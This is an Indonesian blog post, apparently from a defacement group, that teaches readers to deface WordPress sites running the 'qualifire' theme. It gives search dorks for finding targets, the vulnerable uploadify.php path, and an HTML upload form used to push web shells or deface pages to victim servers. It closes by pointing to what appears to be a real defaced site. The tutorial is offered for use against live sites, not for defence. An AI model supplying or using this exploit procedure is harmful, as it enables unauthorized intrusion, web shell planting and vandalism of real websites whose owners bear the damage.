Thursday, January 26, 2017

DEFACE DENGAN METHOD WP-QUALIFIER

Tags

WELCOME ANONYMOUS CYBER TEAM !!!




Kali Ini Saya Akan Memposting

===DEFACE DENGAN METHOD WP-QUALIFIER===


DORK
inurl:"/wp-content/themes/qualifire"
inurl:"/wp-content/themes/qualifire" site:.fr
( kembangin lagi ya drok nya jangan manja )

Kalo udh ketemu web nya  Masukin exploit
Exploit : /wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php
Contoh :
site.tamvan.id/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php


Vuln? biasanya Blank putih atau muncul angka/huruf gak jelas ,
tapi kalo 404 not found berarti ikhlasin aja hehehe

Script Upload CSRF:
NOTE  :

<form
action="http://site.tamvan.id/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php"
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="Submit">
</form>




* Save As: .html (contoh.html)
* edit/ganti site.tamvan.id ~> menjadi link target yang sobat temukan

- Lalu buka .html yang sudah kalian save

- klik browser (pilih shell , pilih script deface , pilih gambar , atau file txt)
*seterah kalian mau upload apa, tapi disini saya akan upload file gambar (png, jpg, gift, dll)

BOOM success
Shell Akses:
http;//site.tamvan.id/namashell.php

karna saya upload gambar jadinya kek gitu:
http://site.tamvan.id/ hacked_zero_s .jpg



Zero_S
 http://www.depal.it/hacked_zero_s.jpg

Mr.Ten_Wap 


Sekian Tutorial Dari Saya
Mohon Maaf Kalau kurang jelas
Terima Kasih


Follow instagram



Subscribe YouTube

By : ZERO_S


Support : MR.Ten_Wap 


EmoticonEmoticon

Edu-Secure